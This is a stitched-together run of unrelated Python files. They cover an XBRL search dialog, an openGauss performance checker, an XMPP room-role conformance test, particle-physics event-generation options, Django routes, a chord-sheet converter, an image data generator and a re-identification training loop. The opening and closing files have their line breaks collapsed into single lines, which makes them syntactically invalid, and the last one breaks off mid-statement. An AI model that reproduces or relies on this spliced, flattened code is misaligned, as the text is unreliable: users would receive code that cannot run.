"), parent=self) return self.modelXbrl = self.modelManager.modelXbrl expr = self.cbExpr.value # update find expressions history if expr in self.options["priorExpressions"]: self.options["priorExpressions"].remove(expr) elif len(self.options["priorExpressions"]) > 10: self.options["priorExpressions"] = self.options["priorExpressions"][0:10] self.options["priorExpressions"].insert(0, expr) self.cbExpr.config(values=self.options["priorExpressions"]) self.saveConfig() import threading thread = threading.Thread(target=lambda expr=self.cbExpr.value, logViewLines=self.modelManager.cntlr.logView.lines() if self.options["messagesLog"] else None : self.backgroundFind(expr, logViewLines)) thread.daemon = True thread.start() def backgroundFind(self, expr, logViewLines): exprType = self.options["exprType"] inConceptLabel = self.options["conceptLabel"] inConceptName = self.options["conceptName"] inConceptType = self.options["conceptType"] inConceptSubs = self.options["conceptSubs"] inConceptPer = self.options["conceptPer"] inConceptBal = self.options["conceptBal"] inFactLabel = self.options["factLabel"] inFactName = self.options["factName"] inFactValue = self.options["factValue"] inFactCntx = self.options["factCntx"] inFactUnit = self.options["factUnit"] inMessagesLog = self.options["messagesLog"] nextIsDown = self.options["direction"] == "down" objsFound = set() self.result = "Found " try: if exprType == "text": # escape regex metacharacters pattern = re.compile(''.join( [(('\\' + c) if c in reMetaChars else c) for c in expr]), re.IGNORECASE) isRE = True isXP = False elif exprType == "regex": pattern = re.compile(expr, re.IGNORECASE) isRE = True isXP = False elif exprType == "xpath": isRE = False isXP = True self.resultText.setValue(_("Compiling xpath expression...")) XPathParser.initializeParser(self.modelManager) self.modelManager.showStatus(_("Compiling xpath expression...")) xpProg= XPathParser.parse(self, expr, XPathParser.staticExpressionFunctionContext(), "find expression", Trace.CALL) xpCtx = XPathContext.create(self.modelXbrl, sourceElement=None) else: return # nothing to do if inMessagesLog: for lineNumber, line in enumerate(logViewLines): if pattern.search(line): objsFound.add(lineNumber) elif self.modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED: for rssItem in self.modelXbrl.modelDocument.items: if any(pattern.search(str(value)) for name, value in rssItem.propertyView): objsFound.add(rssItem) else: # DTS search if inConceptLabel or inConceptName or inConceptType or inConceptSubs or inConceptPer or inConceptBal: self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [_("Matching concepts...")])) self.modelManager.showStatus(_("Matching concepts...")) for conceptName, concepts in self.modelXbrl.nameConcepts.items(): for concept in concepts: if ((isXP and xpCtx.evaluateBooleanValue(xpProg, contextItem=concept.qname)) or (isRE and (inConceptLabel and pattern.search(concept.label())) or (inConceptName and pattern.search(conceptName)) or (inConceptType and pattern.search(str(concept.typeQname))) or (inConceptSubs and pattern.search(str(concept.substitutionGroupQname))) or (inConceptPer and concept.periodType and pattern.search(concept.periodType)) or (inConceptBal and concept.balance and pattern.search(concept.balance)) ) ): objsFound.add(concept) if inFactLabel or inFactName or inFactValue or inFactCntx or inFactUnit: self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [_("Matching facts...")])) self.modelManager.showStatus(_("Matching facts...")) for 
fact in self.modelXbrl.facts: if ((isXP and xpCtx.evaluateBooleanValue(xpProg, contextItem=fact)) or (isRE and (inFactName and pattern.search(fact.concept.name) or (inFactLabel and pattern.search(fact.concept.label())) or (inFactValue and pattern.search(fact.value)) or (inFactCntx and pattern.search(XmlUtil.innerText(fact.context.element))) or (inFactUnit and pattern.search(XmlUtil.innerText(fact.unit.element)))) ) ): objsFound.add(fact) except (XPathContext.XPathException, TypeError, ValueError, OverflowError, IndexError, KeyError, re.error) as err: err = _("Find expression error: {0} \n{1}").format( str(err), getattr(err, "sourceErrorIndication",getattr(err, "pattern",""))) self.modelManager.addToLog(err) self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [err])) self.modelManager.showStatus(_("Completed with errors"), 5000) self.result = err + "\n" numConcepts = 0 numFacts = 0 numRssItems = 0 numMessages = 0 self.objsList = [] for obj in objsFound: if inMessagesLog: numMessages += 1 self.objsList.append( ('m', "{0:06}".format(obj), obj) ) elif isinstance(obj,ModelConcept): numConcepts += 1 self.objsList.append( ('c', obj.localName, obj.objectId()) ) elif isinstance(obj,ModelFact): numFacts += 1 self.objsList.append( ('f', obj.__hash__(), obj.objectId()) ) elif isinstance(obj,ModelRssItem): numRssItems += 1 self.objsList.append( ('r', obj.__hash__(), obj.objectId()) ) self.objsList.sort() if numConcepts: self.result += "{0} concepts".format(numConcepts) if numFacts: self.result += ", " if numFacts: self.result += "{0} facts".format(numFacts) if numRssItems: self.result += "{0} RSS items".format(numRssItems) if numMessages: self.result += "{0} Messages".format(numMessages) if numConcepts + numFacts + numRssItems + numMessages == 0: self.result += "no matches" self.foundIndex = -1 self.modelManager.cntlr.uiThreadQueue.put((self.resultText.setValue, [self.result])) else: self.foundIndex = 0 if nextIsDown else (len(self.objsList) - 1) self.modelManager.cntlr.uiThreadQueue.put((self.next, [])) self.modelManager.showStatus(_("Ready..."), 2000) def next(self): self.setOptions() # refresh options nextIsDown = self.options["direction"] == "down" # check that asme instance applies if not self.options["messagesLog"]: if self.modelXbrl is None: return if self.modelManager.modelXbrl != self.modelXbrl: messagebox.showerror(_("Next cannot be completed"), _("A different DTS is active, than find was initiated with. Please press 'find' to re-search with the current DTS"), parent=self) return lenObjsList = len(self.objsList) if lenObjsList == 0: messagebox.showwarning(_("Next cannot be completed"), _("No matches were found. 
Please try a different search."), parent=self) return if self.foundIndex < 0 and nextIsDown: self.foundIndex += 1 elif self.foundIndex >= lenObjsList and not nextIsDown: self.foundIndex -= 1 if 0 <= self.foundIndex < lenObjsList: objectFound = self.objsList[self.foundIndex][2] if self.options["messagesLog"]: self.modelManager.cntlr.logView.selectLine(objectFound) else: self.modelManager.modelXbrl.viewModelObject(objectFound) self.resultText.setValue("{0}, selection {1} of {2}".format(self.result, self.foundIndex + 1, len(self.objsList) ) ) self.foundIndex += 1 if nextIsDown else -1 elif nextIsDown: self.resultText.setValue("{0}, selection at end".format(self.result) ) else: self.resultText.setValue("{0}, selection at start".format(self.result) ) def close(self, event=None): self.options["geometry"] = self.geometry() self.saveConfig() self.parent.focus_set() self.destroy() def saveConfig(self): self.modelManager.cntlr.config["findOptions"] = self.options self.modelManager.cntlr.saveConfig()
# -*- coding:utf-8 -*-
# Copyright (c) 2020 Huawei Technologies Co.,Ltd.
#
# openGauss is licensed under Mulan PSL v2.
# You can use this software according to the terms
# and conditions of the Mulan PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
#
#          http://license.coscl.org.cn/MulanPSL2
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OF ANY KIND,
# EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
# MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the Mulan PSL v2 for more details.
# ----------------------------------------------------------------------------
import os
import sys

from gspylib.common.Common import DefaultValue
from gspylib.os.gsfile import g_file


class CheckperfImpl():
    """
    Class: check perf impl
    """

    def __init__(self):
        """
        function: constructor
        """
        pass

    def CheckPMKPerf(self, outputInfo):
        """
        function: check pmk perf
        """
        pass

    def CheckSSDPerf(self, outputInfo):
        """
        function: check ssd perf
        input : outputInfo
        output : NA
        """
        pass

    def run(self):
        """
        function: the real interface that execute the check method
        input : NA
        output: NA
        """
        try:
            outputInfo = None
            # check output file
            if self.opts.outFile != "":
                self.opts.outFile_tmp = os.path.join(
                    DefaultValue.getTmpDirFromEnv(self.opts.user),
                    (os.path.split(self.opts.outFile)[1]
                     + "_tmp_%s" % os.getpid()))
                outputInfo = self.setOutFile()
            else:
                outputInfo = sys.stdout

            # check check item
            for key in self.opts.checkItem:
                if key == "PMK":
                    # check PMK
                    self.CheckPMKPerf(outputInfo)
                elif key == "SSD":
                    # check SSD
                    self.CheckSSDPerf(outputInfo)
            # Follow-up
            self.closeFile(outputInfo)
        except Exception as e:
            # close file handle if outputInfo is out file
            if self.opts.outFile and outputInfo:
                outputInfo.flush()
                outputInfo.close()
                if os.path.isfile(self.opts.outFile_tmp):
                    g_file.removeFile(self.opts.outFile_tmp)
            # modify the log file's owner
            g_file.changeOwner(self.opts.user, self.logger.logFile)
            self.logger.error(str(e))
            sys.exit(1)

    def setOutFile(self):
        """
        function: set out file
        input : NA
        output : NA
        """
        # get directory component of a pathname
        dirName = os.path.dirname(self.opts.outFile)
        # judge if directory
        if not os.path.isdir(dirName):
            g_file.createDirectory(dirName, True,
                                   DefaultValue.KEY_DIRECTORY_MODE)
        # create output file and modify permission
        g_file.createFile(self.opts.outFile, True, DefaultValue.KEY_FILE_MODE)
        g_file.changeOwner(self.opts.user, self.opts.outFile)
        self.logger.log(
            "Performing performance check. "
            "Output the checking result to the file %s." % self.opts.outFile)
        # write file
        self.opts.outFile_tmp = os.path.join(
            DefaultValue.getTmpDirFromEnv(self.opts.user),
            (os.path.split(self.opts.outFile)[1] + "_tmp_%s" % os.getpid()))
        if not os.path.isfile(self.opts.outFile_tmp):
            g_file.createFile(self.opts.outFile_tmp, True,
                              DefaultValue.KEY_FILE_MODE)
        g_file.changeOwner(self.opts.user, self.opts.outFile_tmp)
        fp = open(self.opts.outFile_tmp, "w")
        outputInfo = fp
        return outputInfo

    def closeFile(self, fp):
        """
        function: close file
        input : fp
        output : NA
        """
        if self.opts.outFile and fp:
            # close file handle if outputInfo is out file
            fp.flush()
            fp.close()
            g_file.moveFile(self.opts.outFile_tmp, self.opts.outFile)
            self.logger.log("Performance check is completed.")
from sleekxmpp.exceptions import IqError
from sleekxmpp.exceptions import IqTimeout

from ConformanceUtils import init_test
from ConformanceUtils import print_test_description
from JoinMUCBot import JoinTestMUCBot
from config import SECOND_BOT
from config import SECOND_BOT_JID
from config import ROOM_JID

# TODO: still need to add a little more testing to see if the set role
# is actually effective


class EchoBot(JoinTestMUCBot):
    def __init__(self, jid, password, nick):
        JoinTestMUCBot.__init__(self, jid, password, nick)
        self.add_event_handler("got_offline", self.got_offline)

    def other_participant_online(self, msg):
        try:
            self.make_set_role_iq(childtag="NOT-ITEM", role="none").send()
            print("[fail]")
        except IqError as e:
            isCancel = e.iq['error']['type'] == 'cancel'
            isBadRequest = e.iq['error']['condition'] == 'bad-request'
            if isCancel and isBadRequest:
                print("[pass]")
            else:
                print("[fail]")
        except IqTimeout:
            print("[fail]")

        self.send_message(
            mto=ROOM_JID,
            mbody="disconnect %s" % SECOND_BOT,
            mtype='groupchat'
        )

    def got_offline(self, presence):
        # when the second bot disconnects, we disconnect too
        if presence['from'].bare == SECOND_BOT_JID:
            self.disconnect()


class SecondBot(JoinTestMUCBot):
    def __init__(self, jid, password, nick):
        JoinTestMUCBot.__init__(self, jid, password, nick)
        self.add_event_handler("groupchat_message", self.muc_message)

    def muc_message(self, msg):
        if msg['body'] == 'disconnect %s' % SECOND_BOT:
            self.disconnect()


if __name__ == '__main__':
    print_test_description(
        "An admin iq with something different than an 'item' tag as child "
        + "of query should return a bad-request error ..."
    )
    init_test(
        class_first_bot=EchoBot,
        class_second_bot=SecondBot
    )
from MadGraphControl.MadGraphUtils import *
import math

fcard = open('proc_card_mg5.dat', 'w')

# generate ... QED=0 QCD=3
fcard.write("""
import model DMsimp_s_spin1 -modelname
define p = g u c d s b u~ c~ d~ s~ b~
define j = g u c d s b u~ c~ d~ s~ b~
""")
if "ee" in runArgs.jobConfig[0]:
    fcard.write("""
generate p p > Y1 > e+ e-
""")
elif "mumu" in runArgs.jobConfig[0]:
    fcard.write("""
generate p p > Y1 > mu+ mu-
""")
else:
    raise RuntimeError("No dilepton channel specified.")
fcard.write("""
output -f
""")
fcard.close()

beamEnergy = -999
if hasattr(runArgs, 'ecmEnergy'):
    beamEnergy = runArgs.ecmEnergy / 2.
else:
    raise RuntimeError("No center of mass energy found.")

process_dir = new_process()

# Fetch default LO run_card.dat and set parameters
extras = {'lhe_version': '2.0',
          'cut_decays': 'F',
          'pdlabel': "'lhapdf'",
          'lhaid': 263000,
          'ickkw': 1,
          #'xptj' : xptj,
          'etaj': 5}
# from https://twiki.cern.ch/twiki/bin/viewauth/AtlasProtected/MadGraph5aMCatNLOForAtlas#Problems_with_run_card_dat_in_ne
build_run_card(run_card_old=get_default_runcard(proc_dir=process_dir), run_card_new='run_card.dat',
               xqcut=10, nevts=runArgs.maxEvents*2, rand_seed=runArgs.randomSeed,
               beamEnergy=beamEnergy, extras=extras)
print_cards()

paramcard = subprocess.Popen(['get_files', '-data', 'MadGraph_param_card_DMsimp_s_spin1.dat'])
paramcard.wait()
if not os.access('MadGraph_param_card_DMsimp_s_spin1.dat', os.R_OK):
    print 'ERROR: Could not get param card'
elif os.access('param_card.dat', os.R_OK):
    print 'ERROR: Old param card in the current directory. Dont want to clobber it. Please move it first.'
else:
    oldcard = open('MadGraph_param_card_DMsimp_s_spin1.dat', 'r')
    newcard = open('param_card.dat', 'w')
    for line in oldcard:
        if '# gVXd' in line:
            newcard.write(' 2 %e # gVXd \n' % (gVXd))
        elif '# gAXd' in line:
            newcard.write(' 3 %e # gAXd \n' % (gAXd))
        elif '# gVd11' in line:
            newcard.write(' 4 %e # gVd11 \n' % (gVd11))
        elif '# gVu11' in line:
            newcard.write(' 5 %e # gVu11 \n' % (gVu11))
        elif '# gVd22' in line:
            newcard.write(' 6 %e # gVd22 \n' % (gVd22))
        elif '# gVu22' in line:
            newcard.write(' 7 %e # gVu22 \n' % (gVu22))
        elif '# gVd33' in line:
            newcard.write(' 8 %e # gVd33 \n' % (gVd33))
        elif '# gVu33' in line:
            newcard.write(' 9 %e # gVu33 \n' % (gVu33))
        elif '# gVl11' in line:
            newcard.write(' 10 %e # gVl11 \n' % (gVl11))
        elif '# gVl22' in line:
            newcard.write(' 11 %e # gVl22 \n' % (gVl22))
        elif '# gVl33' in line:
            newcard.write(' 12 %e # gVl33 \n' % (gVl33))
        elif '# gAd11' in line:
            newcard.write(' 13 %e # gAd11 \n' % (gAd11))
        elif '# gAu11' in line:
            newcard.write(' 14 %e # gAu11 \n' % (gAu11))
        elif '# gAd22' in line:
            newcard.write(' 15 %e # gAd22 \n' % (gAd22))
        elif '# gAu22' in line:
            newcard.write(' 16 %e # gAu22 \n' % (gAu22))
        elif '# gAd33' in line:
            newcard.write(' 17 %e # gAd33 \n' % (gAd33))
        elif '# gAu33' in line:
            newcard.write(' 18 %e # gAu33 \n' % (gAu33))
        elif '# gAl11' in line:
            newcard.write(' 19 %e # gAl11 \n' % (gAl11))
        elif '# gAl22' in line:
            newcard.write(' 20 %e # gAl22 \n' % (gAl22))
        elif '# gAl33' in line:
            newcard.write(' 21 %e # gAl33 \n' % (gAl33))
        elif ' MY1 ' in line:
            newcard.write(' 5000001 %e # MY1 \n' % (MY1))
        elif 'DECAY 5000001' in line:
            newcard.write('DECAY 5000001 auto #WY1 \n')
        elif ' xd : MXd ' in line:
            newcard.write(' 1000022 %e # xd : MXd \n' % (MXd))
        elif ' # MXd ' in line:
            newcard.write(' 1000022 %e # MXd \n' % (MXd))
        else:
            newcard.write(line)
    oldcard.close()
    newcard.close()

runName = 'run_01'

generate(run_card_loc='run_card.dat', param_card_loc='param_card.dat', mode=0, njobs=1,
         run_name=runName, proc_dir=process_dir)
arrange_output(run_name=runName, proc_dir=process_dir,
               outputDS=runName + '._00001.events.tar.gz')

#### Shower
#evgenConfig.description = "Wimp dmA mediator from DMSimp, ptj>"+str(xptj)+" GeV"
evgenConfig.description = "Wimp dmA mediator from DMSimp"
evgenConfig.keywords = ["exotic", "BSM"]
evgenConfig.process = "pp > Y1 > ll"
evgenConfig.inputfilecheck = runName
runArgs.inputGeneratorFile = runName + '._00001.events.tar.gz'
evgenConfig.contact = ["Marie-Helene Genest <[email protected]>"]

include("MC15JobOptions/Pythia8_A14_NNPDF23LO_EvtGen_Common.py")
include("MC15JobOptions/Pythia8_MadGraph.py")
#include("MC15JobOptions/Pythia8_aMcAtNlo.py")

# particle data = name antiname spin=2s+1 3xcharge colour mass width
# (left out, so set to 0: mMin mMax tau0)
genSeq.Pythia8.Commands += ["1000022:all = xd xd~ 2 0 0 %d 0" % (MXd),
                            "1000022:isVisible = false"]
from django.urls import path

from . import views

urlpatterns = [
    path('', views.index, name='index'),
    path('homepage', views.homepage, name='homepage'),
    path('doneby', views.doneby, name='doneby'),
    path('link_1', views.link_1, name='link_1'),
    path('link_2', views.link_2, name='link_2'),
    path('link_3', views.link_3, name='link_3'),
    path('link_4', views.link_4, name='link_4'),
    path('link_5', views.link_5, name='link_5'),
    path('link_6', views.link_6, name='link_6'),
    path('link_7', views.link_7, name='link_7'),
    path('link_8', views.link_8, name='link_8'),
    path('link_9', views.link_9, name='link_9'),
    path('link_10', views.link_10, name='link_10'),
    path('link_11', views.link_11, name='link_11'),
    path('link_12', views.link_12, name='link_12'),
    path('link_13', views.link_13, name='link_13'),
    path('link_14', views.link_14, name='link_14'),
    path('link_15', views.link_15, name='link_15'),
    path('your_options', views.your_options, name="your_options"),
    path('MDU_options', views.MDU_options, name="MDU_options"),
    path('graph_options', views.graph_options, name="graph_options"),
    path('PD_results', views.PD_results, name="PD_results"),
    path('TH_results', views.TH_results, name="TH_results"),
    path('QC_results', views.QC_results, name="QC_results"),
    path('VC_results', views.VC_results, name="VC_results"),
    path('V_results', views.V_results, name="V_results"),
    path('I_results', views.I_results, name="I_results"),
    path('cases_results', views.cases_results, name="cases_results"),
]
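# The URL patterns above all dispatch to functions in a views module that is
# not included in this file. The sketch below is hypothetical: the view bodies
# and template names are assumptions, shown only to illustrate what the
# referenced callables need to look like for these routes to resolve.
from django.shortcuts import render


def index(request):
    # Hypothetical landing-page view matching path('', views.index).
    return render(request, 'index.html')


def homepage(request):
    # Hypothetical view matching path('homepage', views.homepage).
    return render(request, 'homepage.html')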
"""Unit test package for zshpower."""
import tkinter as Tkinter
from tkinter import font as tkFont
from docx import Document
import re

Tkinter.Frame().destroy()
chordFont = tkFont.Font(family="Times New Roman", size=8, weight="bold")
textFont = tkFont.Font(family="Times New Roman", size=10)


def isTitle(inputString):
    return any(char.isdigit() for char in inputString)


def getTitle(inputString):
    return inputString.split('.')[1]


def getSongNo(inputString):
    return inputString.split('.')[0]


def getScale(inputString):
    return inputString.split(' ')[0]


def get_printed_size(text, font):
    return font.measure(text)


def find_index(s1, loc):
    for i, c in enumerate(s1):
        if get_printed_size(s1[0:i], textFont) > loc:
            return i + 1


def get_chord_vector(s1):
    chordregex = '[A-Za-z][A-Za-z0-9]*'
    cvector = dict()
    for match in re.finditer(chordregex, s1):
        s = match.start()
        e = match.end()
        cvector[get_printed_size(s1[0:s], chordFont)] = s1[s:e]
    return cvector


def insert_chords(s1, cv):
    oi = 0
    os = ""
    for loc in cv:
        i = find_index(s1, loc)
        os = os + s1[oi:i] + '[' + cv[loc] + ']'
        oi = i
    os = os + s1[oi:len(s1)]
    return os


document = Document('data/NTC Songs 1-1000.docx')
styles = document.styles

count = 0
firstLine = False
hasChords = True
inChorus = False
cv = dict()

for para in document.paragraphs:
    if str(para.style.name) == "SONG TITLE":
        count = count + 1
        # if count > 157:
        #     exit(0)
        if isTitle(para.text):
            print("\n\n{song number: " + getSongNo(para.text.lstrip()) + "}")
            print("{title: " + getTitle(para.text.lstrip()) + "}")
            firstLine = True
    if firstLine and (para.style.name == "CHORDS"):
        print("Scale: " + getScale(para.text.lstrip()))
        firstLine = False
    if para.style.name == "CHORDS":
        hasChords = True
        cv = get_chord_vector(para.text.replace("\t", " "))
        # for x in cv:
        #     print('Chord : %s in location %d' % (cv[x], x))
    if para.style.name == "REGULAR" and para.text.strip() == "Chorus:":
        inChorus = True
        print("{start_of_chorus}")
    if inChorus and para.style.name == "REGULAR" and len(para.text.strip()) == 0:
        inChorus = False
        print("{end_of_chorus}")
    if para.style.name == "REGULAR":
        if hasChords:
            print(insert_chords(para.text.replace("\t", " "), cv))
        else:
            print(para.text)
        hasChords = False
# -*- coding: utf-8 -*-
"""Setup file."""
from setuptools import setup

setup(
    use_scm_version=True,
    setup_requires=['setuptools_scm'],
)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 25 05:24:19 2018

@author: work
"""
import numpy as np

from preprocess import affine_transform_batch, elastic_transform_batch, \
    enhance, level_noise, stretch, insert


def num_iterator(total, batch_size, shuffle=True):
    nb_seen = 0
    inds = np.arange(total)
    if shuffle:
        np.random.shuffle(inds)
    while True:
        if nb_seen + batch_size > total:
            ind_batch = inds[nb_seen:]
            if shuffle:
                np.random.shuffle(inds)
            nb_seen = nb_seen + batch_size - total
            ind_batch = np.hstack([ind_batch, inds[:nb_seen]])
        else:
            ind_batch = inds[nb_seen:nb_seen + batch_size]
            nb_seen += batch_size
        yield ind_batch


def data_generator_multi(images, masks, config, shuffle=True, augment=False,
                         batch_size=None, tp_value=8):
    batch_size = config.BATCH_SIZE if batch_size is None else batch_size
    iterator = num_iterator(masks.shape[0], batch_size, shuffle=shuffle)
    while True:
        ind_batch = next(iterator)
        image_batch = images[ind_batch].copy().astype('float32')
        mask_batch = masks[ind_batch].copy()
        if augment:
            tp = np.random.randint(tp_value)
            if tp == 1:
                if np.random.rand() > 0.5:
                    image_batch = image_batch[:, :, ::-1]
                    mask_batch = mask_batch[:, :, ::-1]
                else:
                    image_batch = image_batch[:, ::-1]
                    mask_batch = mask_batch[:, ::-1]
            elif tp == 2:
                image_batch, mask_batch = affine_transform_batch(
                    image_batch, mask_batch,
                    rotation_range=config.ROTATION_RANGE,
                    width_shift_range=config.WIDTH_SHIFT_RANGE,
                    height_shift_range=config.HEIGHT_SHIFT_RANGE,
                    shear_range=config.SHEAR_RANGE,
                    zoom_range=config.ZOOM_RANGE)
            elif tp == 3:
                image_batch, mask_batch = elastic_transform_batch(
                    image_batch, mask_batch,
                    alpha=config.ALPHA, sigma=config.SIGMA)
            elif tp == 4:
                tries = np.random.randint(20, 100)
                max_fails = 5
                image_batch, mask_batch = insert(image_batch, mask_batch,
                                                 tries, max_fails)
            elif tp == 5:
                image_batch = enhance(image_batch, mask_batch, max_tries=10,
                                      max_enhance_ratio=0.8)
            elif tp == 6:
                image_batch = level_noise(image_batch, mask_batch,
                                          max_level_ratio=4,
                                          max_noise_ratio=0.05)
            elif tp == 7:
                image_batch, mask_batch = stretch(image_batch, mask_batch,
                                                  max_ratio=2)
        '''
        image_max = np.max(image_batch, axis=(1,2,3), keepdims=True)
        image_max[image_max==0] = 1
        amax = np.random.randint(200, 256) if augment else 255
        image_batch = image_batch/image_max*amax
        '''
        yield [image_batch.astype('float32'), mask_batch]
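# Hypothetical usage sketch for data_generator_multi above. The Config
# attribute names mirror the ones the generator reads, but every value and the
# random stand-in arrays below are assumptions; the real project supplies its
# own config object and preprocessed image/mask arrays, and the `preprocess`
# module imported above must be importable for this file to load at all.
class _SketchConfig:
    BATCH_SIZE = 4
    ROTATION_RANGE = 10.
    WIDTH_SHIFT_RANGE = 0.1
    HEIGHT_SHIFT_RANGE = 0.1
    SHEAR_RANGE = 0.1
    ZOOM_RANGE = 0.1
    ALPHA = 100.
    SIGMA = 10.


if __name__ == '__main__':
    # Random stand-in data just to exercise the batching logic; with
    # augment=False none of the preprocess helpers are actually invoked.
    images = np.random.randint(0, 255, size=(16, 128, 128, 3)).astype('uint8')
    masks = np.random.randint(0, 2, size=(16, 128, 128, 1)).astype('uint8')
    gen = data_generator_multi(images, masks, _SketchConfig(),
                               shuffle=True, augment=False)
    image_batch, mask_batch = next(gen)
    print(image_batch.shape, mask_batch.shape)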
# encoding: utf-8 """ @author: sherlock @contact: [email protected] """ import logging import time import numpy as np import torch import torch.nn as nn from ignite.engine import Engine, Events from ignite.handlers import ModelCheckpoint, Timer from ignite.metrics import RunningAverage from layers import make_loss from data import make_camstyle_target_unsupdata_loader, make_camstyle_alltrain_data_loader from utils.reid_metric import R1_mAP from utils.reid_metric import Cluster import torch.distributed as dist from torch.distributed import get_rank, get_world_size def create_supervised_trainer(model, optimizer, loss_fn, loss_weight, device=None, device_id=-1): """ Factory function for creating a trainer for supervised models Args: model (`torch.nn.Module`): the model to train optimizer (`torch.optim.Optimizer`): the optimizer to use loss_fn (torch.nn loss function): the loss function to use device (str, optional): device type specification (default: None). Applies to both model and batches. Returns: Engine: a trainer engine with supervised update function """ if device: if torch.cuda.device_count() > 1: model = nn.DataParallel(model) model.to(device) else: model.to(device) def _update(engine, batch): model.train() optimizer.zero_grad() batch = engine.state.batch img, target, setid = batch[0][0], batch[0][1], batch[0][2] img = img.to(device) if torch.cuda.device_count() >= 1 else img target = target.to(device) if torch.cuda.device_count() >= 1 else target feats = model(img) losses = [] for i in range(len(loss_fn)): loss = torch.tensor(0.).cuda() if i == setid[0]: for j in range(len(loss_fn[i])): loss += loss_fn[i][j](feats[i], feats[-1], target) else: loss += 0. * torch.sum(feats[i]) loss += 0. * sum(p.sum() for p in model.parameters()) losses.append(loss) camstyle_img, camstyle_target, camstyle_setid = batch[1][0], batch[1][1], batch[1][2] camstyle_img = camstyle_img.to(device) if torch.cuda.device_count() >= 1 else camstyle_img camstyle_target = camstyle_target.to(device) if torch.cuda.device_count() >= 1 else camstyle_target camstyle_feats = model(camstyle_img) camstyle_losses = [] for i in range(len(loss_fn)): camstyle_loss = torch.tensor(0.).cuda() if i == camstyle_setid[0]: for j in range(len(loss_fn[i])): camstyle_loss += loss_fn[i][j](camstyle_feats[i], camstyle_feats[-1], camstyle_target) else: camstyle_loss += 0. * torch.sum(camstyle_feats[i]) camstyle_loss += 0. * sum(p.sum() for p in model.parameters()) camstyle_losses.append(camstyle_loss) all_losses = [] for i in range(len(loss_fn)): backloss = losses[i] * loss_weight[i] + camstyle_losses[i] * loss_weight[i] if i == len(loss_fn) - 1: backloss.backward() else: backloss.backward(retain_graph=True) all_losses.append(backloss) optimizer.step() return {'src':all_losses[0].item(), 'tgt_unsup':all_losses[1].item()} return Engine(_update) def create_supervised_evaluator(model, metrics, device=None, device_id=-1): """ Factory function for creating an evaluator for supervised models Args: model (`torch.nn.Module`): the model to train metrics (dict of str - :class:`ignite.metrics.Metric`): a map of metric names to Metrics device (str, optional): device type specification (default: None). Applies to both model and batches. 
Returns: Engine: an evaluator engine with supervised inference function """ def _inference(engine, batch): model.eval() with torch.no_grad(): data, pids, camids, _ = batch data = data.to(device) if torch.cuda.device_count() >= 1 else data feat = model(data) return feat, 0, 0, pids, camids engine = Engine(_inference) for name, metric in metrics.items(): metric.attach(engine, name) return engine def create_psolabel_producer(model, camera_model, metrics, device=None, device_id=-1): """ Factory function for creating an evaluator for supervised models Args: model (`torch.nn.Module`): the model to train camera_model (`torch.nn.Module`): the camera model to extract camera features metrics (dict of str - :class:`ignite.metrics.Metric`): a map of metric names to Metrics device (str, optional): device type specification (default: None). Applies to both model and batches. Returns: Engine: an evaluator engine with supervised inference function """ if device: if torch.cuda.device_count() > 1: camera_model = nn.DataParallel(camera_model) camera_model.to(device) else: camera_model.to(device) def _inference(engine, batch): model.eval() camera_model.eval() with torch.no_grad(): data, pids, camids, trkids = batch data = data.to(device) if torch.cuda.device_count() >= 1 else data feat = model(data) _, camfeat = camera_model(data) return feat, camfeat, pids, camids, trkids engine = Engine(_inference) for name, metric in metrics.items(): metric.attach(engine, name) return engine def do_train( cfg, model, camera_model, val_data_loader, optimizer, scheduler, loss_fn, num_query, start_epoch, device_id ): log_period = cfg.SOLVER.LOG_PERIOD checkpoint_period = cfg.SOLVER.CHECKPOINT_PERIOD eval_period = cfg.SOLVER.EVAL_PERIOD psolabel_period = cfg.TGT_UNSUPDATA.PSOLABEL_PERIOD output_dir = cfg.OUTPUT_DIR epochs = cfg.SOLVER.MAX_EPOCHS device = cfg.MODEL.DEVICE logger = logging.getLogger("reid_baseline.train") logger.info("Start training") trainer = create_supervised_trainer(model, optimizer, loss_fn, cfg.LOSS.LOSS_WEIGHTS, device=device, device_id=device_id) evaluator = create_supervised_evaluator(model, metrics={'r1_mAP': R1_mAP(num_query, True, False, max_rank=50, feat_norm=cfg.TEST.FEAT_NORM)}, device=device, device_id=device_id) psolabel_producer = create_psolabel_producer(model, camera_model, metrics={'cluster': Cluster(topk=cfg.TGT_UNSUPDATA.CLUSTER_TOPK,dist_thrd=cfg.TGT_UNSUPDATA.CLUSTER_DIST_THRD, finetune=cfg.MODEL.FINETUNE)}, device=device, device_id=device_id) if device_id == 0: checkpointer = ModelCheckpoint(output_dir, cfg.MODEL.NAME, checkpoint_period, n_saved=10, require_empty=False) trainer.add_event_handler(Events.EPOCH_COMPLETED, checkpointer, {'model': model.state_dict(), 'optimizer': optimizer.state_dict()}) timer = Timer(average=True) timer.attach(trainer, start=Events.EPOCH_STARTED, resume=Events.ITERATION_STARTED, pause=Events.ITERATION_COMPLETED, step=Events.ITERATION_COMPLETED) # average metric to attach on trainer RunningAverage(output_transform=lambda x: x['src']).attach(trainer, 'src_loss') RunningAverage(output_transform=lambda x: x['tgt_unsup']).attach(trainer, 'tgt_unsup_loss') @trainer.on(Events.STARTED) def start_training(engine): engine.state.epoch = start_epoch @trainer.on(Events.EPOCH_STARTED) def adjust_learning_rate(engine): scheduler.step() def cycle(iterable): while True: for i in iterable: yield i @trainer.on(Events.ITERATION_COMPLETED) def log_training_loss(engine): iter = (engine.state.iteration - 1) % len(alltrain_data_loader) + 1 if iter % log_period == 0: if 
